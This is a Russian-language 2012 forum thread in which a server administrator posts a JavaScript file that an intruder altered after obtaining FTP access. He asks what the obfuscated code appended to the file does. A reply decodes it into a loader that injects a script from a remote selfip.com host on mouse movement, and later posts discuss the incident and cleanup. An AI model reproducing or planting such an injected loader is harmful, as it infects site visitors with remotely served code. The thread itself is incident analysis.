URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID10
Нить номер: 5023
[ Назад ]

Исходное сообщение
"Чего хотел взломщик?"

Отправлено ck80 , 12-Апр-12 10:47 
Ubuntu server 9.10 + vsftpd 2.2.0-1

Сегодня утром просматривая отчёты logwatch, заметил что кто-то, каким-то образом подобрал пароль на наш ftp (пароль был f2t3p4!) и заменил все .js файлы на свои.

.js файлы лежали в то числе в Driver Pack Solution.

Оригинальный файл DRPSu12\tools\modules\resize.js
----------------------------------------------------------------
// On change size of the window
try {
    self.resizeTo(width,height - 25);
    self.moveTo((screen.width / 2) - (width / 2), (screen.height / 2) - (height / 2));
    //if (screen.width==640){
    if ((screen.width<width)||(screen.height<height)){
        self.resizeTo(800,600 - 25);
        self.moveTo(0,0);
        window.attachEvent('onload',function(){tooglePanel();});
    }
//    if (screen.height<height){ //On netbooks
//        window.attachEvent('onload',function(){
//            self.resizeTo(width,$(window).height() - 25);
//var callWidth = (screen.width / 2) - ($(window).width() / 2) - 23;
//var callHeight = (screen.height / 2) - (($(window).height()+80) / 2);
//alert((screen.height / 2));
//alert(($(window).height()+80) / 2);
//            self.moveTo((callWidth>0?callWidth:0), callHeight);
//        });
//    }
}
catch(err) { }
// Change title window
document.title = document.title + " " + version + " " + verType;


//Auto hide/show left panel
try {
    window.attachEvent('onresize',
        function(){
            if ($(window).width()<718){    //hide panel
                tooglePanel(false);
            }
            else if ($(window).width()>(800)){    //show panel
                tooglePanel(true);
            }
        }
    );
}
catch(err) { }
---------------------------------------------------------------------------------

Изменённый файл DRPSu12\tools\modules\resize.js
---------------------------------------------------------------------------------
// On change size of the window
try {
    self.resizeTo(width,height - 25);
    self.moveTo((screen.width / 2) - (width / 2), (screen.height / 2) - (height / 2));
    //if (screen.width==640){
    if ((screen.width<width)||(screen.height<height)){
        self.resizeTo(800,600 - 25);
        self.moveTo(0,0);
        window.attachEvent('onload',function(){tooglePanel();});
    }
//    if (screen.height<height){ //On netbooks
//        window.attachEvent('onload',function(){
//            self.resizeTo(width,$(window).height() - 25);
//var callWidth = (screen.width / 2) - ($(window).width() / 2) - 23;
//var callHeight = (screen.height / 2) - (($(window).height()+80) / 2);
//alert((screen.height / 2));
//alert(($(window).height()+80) / 2);
//            self.moveTo((callWidth>0?callWidth:0), callHeight);
//        });
//    }
}
catch(err) { }
// Change title window
document.title = document.title + " " + version + " " + verType;


//Auto hide/show left panel
try {
    window.attachEvent('onresize',
        function(){
            if ($(window).width()<718){    //hide panel
                tooglePanel(false);
            }
            else if ($(window).width()>(800)){    //show panel
                tooglePanel(true);
            }
        }
    );
}
catch(err) { }

c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i14i81i79i59i80i70i75i6i78i77i63i74i76i74i65i68i74i71i6i75i61i68i62i65i72i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"a"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;690!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](w[j]*1+40);}if(f)z=s;e(z);
-------------------------------------------------------------------------------------

Как видно, добавлен приличный кусок кода, Я догадываюсь, что это зашифрованное выполнение какой-то команды, но хотелось бы понять чего хотел взломщик? Расшифруйте, пожалуйста, кто может?


Содержание

Сообщения в этом обсуждении
"Чего хотел взломщик?"
Отправлено profalex , 12-Апр-12 13:29 
> Как видно, добавлен приличный кусок кода, Я догадываюсь, что это зашифрованное выполнение
> какой-то команды, но хотелось бы понять чего хотел взломщик? Расшифруйте, пожалуйста,
> кто может?

Вот что:


(function() {
    var url = 'http://6ywcxns.vugrtrilro.selfip.com/g/';
    if (typeof window.xyzflag === 'undefined') {
        window.xyzflag = 0;
    }
    document.onmousemove = function() {
        if (window.xyzflag === 0) {
            window.xyzflag = 1;
            var head = document.getElementsByTagName('head')[0];
            var script = document.createElement('script');
            script.type = 'text/javascript';
            script.onreadystatechange = function () {
                if (this.readyState == 'complete') {
                    window.xyzflag = 2;
                }
            };
            script.onload = function() {
                window.xyzflag = 2;
            };
            script.src = url + Math.random().toString().substring(3) + '.js';
            head.appendChild(script);
        }
    };
})();


"Чего хотел взломщик?"
Отправлено ck80 , 12-Апр-12 13:37 
>> Как видно, добавлен приличный кусок кода, Я догадываюсь, что это зашифрованное выполнение
>> какой-то команды, но хотелось бы понять чего хотел взломщик? Расшифруйте, пожалуйста,
>> кто может?
> Вот что:
> (function() {
>  var url = 'http://6ywcxns.vugrtrilro.selfip.com/g/';
>  if (typeof window.xyzflag === 'undefined') {

Спасибо, ещё больше ничего не понятно.  :)


"Чего хотел взломщик?"
Отправлено user , 12-Апр-12 15:32 
>>> Как видно, добавлен приличный кусок кода, Я догадываюсь, что это зашифрованное выполнение
>>> какой-то команды, но хотелось бы понять чего хотел взломщик? Расшифруйте, пожалуйста,
>>> кто может?
>> Вот что:
>> (function() {
>>  var url = 'http://6ywcxns.vugrtrilro.selfip.com/g/';
>>  if (typeof window.xyzflag === 'undefined') {
> Спасибо, ещё больше ничего не понятно.  :)

Че не понятно то? В страничку внедряется нечто скачиваемое с http://6ywcxns.vugrtrilro.selfip.com/g


"Чего хотел взломщик?"
Отправлено Алексей , 13-Апр-12 16:41 
>[оверквотинг удален]
>     }
>    };
>    script.onload = function() {
>     window.xyzflag = 2;
>    };
>    script.src = url + Math.random().toString().substring(3) + '.js';
>    head.appendChild(script);
>   }
>  };
> })();

Чем, если не секрет раскрыли бинарник?


"Чего хотел взломщик?"
Отправлено Andrey Mitrofanov , 13-Апр-12 16:46 
чем-чем, заменил e() в конце каким ни то print-ом.

"Чего хотел взломщик?"
Отправлено freepaint , 14-Апр-12 01:30 
ЗДРАВСТВУЙТЕ!
СРОЧНО ОБЪЕДЕНЯЕМСЯ!!!
у меня тоже в ява кодах точно такой код на сайте
заметил примерно в то же время 12-13 апреля 2012 года.
давайте копать!!!

ВОТ МОИ КОНТАКТЫ:
IСИQ:   55-99-8-ноль
e_mail: freepainte(собчак)yandex.ru

Доступ ftp никому не довал
Хостинг: IHC.ru (намек на него)

Если узнаем кто это делает, то попробуем потрясти его хорошенько!
Прикинь, если это хостинг! )) вот мы его на бабки раскрутим!

в общем давай копать. жду!


"Чего хотел взломщик?"
Отправлено Alex , 14-Апр-12 23:04 
Ваш хостинг точно тут не причем, потому, что у меня заразились аналогичным вирусом сразу 5 разных сайтов. при этом они расположены на 2 разных хостингах.
Заражение всех сайтов на одном хостинге произошло примерно в одно и тоже время (дата обновления файлов на каждом сайте отличается всего на 1-2 мин), а вот на втором хостинге раньше на 1 день. Получается, что заражали сразу целыми хостингами.

Восстановить работоспособность сайтов удалось сразу, путем обновления файлов из резервной копии на локальном комьютере, но вот заражение мне кажется было не через FTP сайта, а непосредственно на сервере провайдера.
Кстати вот здесь есть скрипт, который вроде как лечит данную проблему:
https://gist.github.com/2359497/efb3d61a97231abdaa746ce8981d...
(сам я его не запускал, обновил всё через верезрвную копию, но возможно кому-то пригодиться.)


"Чего хотел взломщик?"
Отправлено freepaint , 15-Апр-12 22:30 
>[оверквотинг удален]
> время (дата обновления файлов на каждом сайте отличается всего на 1-2
> мин), а вот на втором хостинге раньше на 1 день. Получается,
> что заражали сразу целыми хостингами.
> Восстановить работоспособность сайтов удалось сразу, путем обновления файлов из резервной
> копии на локальном комьютере, но вот заражение мне кажется было не
> через FTP сайта, а непосредственно на сервере провайдера.
> Кстати вот здесь есть скрипт, который вроде как лечит данную проблему:
> https://gist.github.com/2359497/efb3d61a97231abdaa746ce8981d...
> (сам я его не запускал, обновил всё через верезрвную копию, но возможно
> кому-то пригодиться.)

ПОЧЕМУ вы не постучались? (совершенно случайно второй раз попал на этот сайт из за вашего неответа! чуть не потерял с вами контакт) давайте решим эту проблему. ею все больше и большн заражаются разработчики и не знают в чем дело, т.к коды разные, но схема одна!!! все даты идут на 12 число!!! хотя софт и сервер у мене не менялись годами!!! скорее всего тот "черный админ" заготовил глобальные планы давным давно, вшив в "кое что" коды уязвимости какой то программы или сервера, завоевав максимум доверия на бездействии проснулся и начал свое черные дела, как нептун!
мая асъъко: 5 59 9 8 0

- проблема может быть во всем, и хостинг не был исключением, но я уже точно знаю что не хостинг (свои проверки)

вот к примеру еще одна наводка: странный FTP клиент от FIRE ZILLA portabe - пользуюсь им около 4 лет. Был скачен на очень крупном сайте типа ОпенФортча, он создавал портативные официальные версии программ по КОНТРАКТУ! возможно что то там у них не чисто хз. т.к на официальном сайте FIRE ZILLA в данный момент нет никаких наводок на этот сервис, да и вообще о портатиыной версии ВООБЩЕ!

после этого удалил ее нахер и скачал с ОпенФортча по ссылке с офсайта FIRE ZILLA!


давайте копать наконец то!
загвостка гдето на носу!


и кстати той утилитой по удалению подобного кода невозможно удалить динамический код.
а у меня этот вирус сделал динамику в содержимом, ява скриптов у меня около 100 шт на сервере, мне пришлось потратить более часа на его чистку(((((


"Чего хотел взломщик?"
Отправлено ck80 , 16-Апр-12 12:42 
>[оверквотинг удален]
> на официальном сайте FIRE ZILLA в данный момент нет никаких наводок
> на этот сервис, да и вообще о портатиыной версии ВООБЩЕ!
> после этого удалил ее нахер и скачал с ОпенФортча по ссылке с
> офсайта FIRE ZILLA!
> давайте копать наконец то!
> загвостка гдето на носу!
> и кстати той утилитой по удалению подобного кода невозможно удалить динамический код.
> а у меня этот вирус сделал динамику в содержимом, ява скриптов у
> меня около 100 шт на сервере, мне пришлось потратить более часа
> на его чистку(((((

У меня фтп не на хостинге, а на корпораитвном сервере.
На сервере стоит fail2ban, denyhost. Попыток подбора паролей не было. Судя по логам был сразу вход. ФТПшником пользуются несколько сотрудников. Я подозреваю, что кто-то из них заразился вирусом и вирус вытащил сохранённые пароли от ФТП

В логах сохранился IP взломщика: 50.115.122.28
Написал abuse по хуизу, ответили:

==========================================================
abuse@midphase.com
Hello,

Thank you for notifying of this abuse complaint. We have taken the necessary steps in order to resolve the incident. Please let us know if the situation arises again, or if you have any questions.

--
--
Kind Regards
--
Victoriya Ivanusa
100TB.com
==========================================================


"Чего хотел взломщик?"
Отправлено Alex , 16-Май-12 20:39 
Числит сайт от этой хрени (кстати, появилась она с месяц назад, и вирусы её не ловили и пропускали как нормальный код) - все js перезаписала в конец. Код динамический в середине - начало и конец одинаковые, автозамена не прокатила. В итоге после очередного сообщения о вирусах на сайте вручную слил весь сайт и ручками поудалял этот код. Собственно, к чему это все :) Проблема не один раз почистить - а понять, как он туда попадает и предотвратить. Доступа прямого ни у кого нет, пароль отдельно от FTP клиента хранится?

"Чего хотел взломщик?"
Отправлено Аноним , 17-Май-12 04:37 
> Числит сайт от этой хрени (кстати, появилась она с месяц назад, и
> вирусы её не ловили и пропускали как нормальный код) - все
> js перезаписала в конец. Код динамический в середине - начало и
> конец одинаковые, автозамена не прокатила. В итоге после очередного сообщения о
> вирусах на сайте вручную слил весь сайт и ручками поудалял этот
> код. Собственно, к чему это все :) Проблема не один раз
> почистить - а понять, как он туда попадает и предотвратить. Доступа
> прямого ни у кого нет, пароль отдельно от FTP клиента хранится?

нужно смотреть на дату изменения файлов (тут вы уже пролетели, конечно) и в логи (http, ftp) в которых искать, что было во в то время, когда менялись файлы.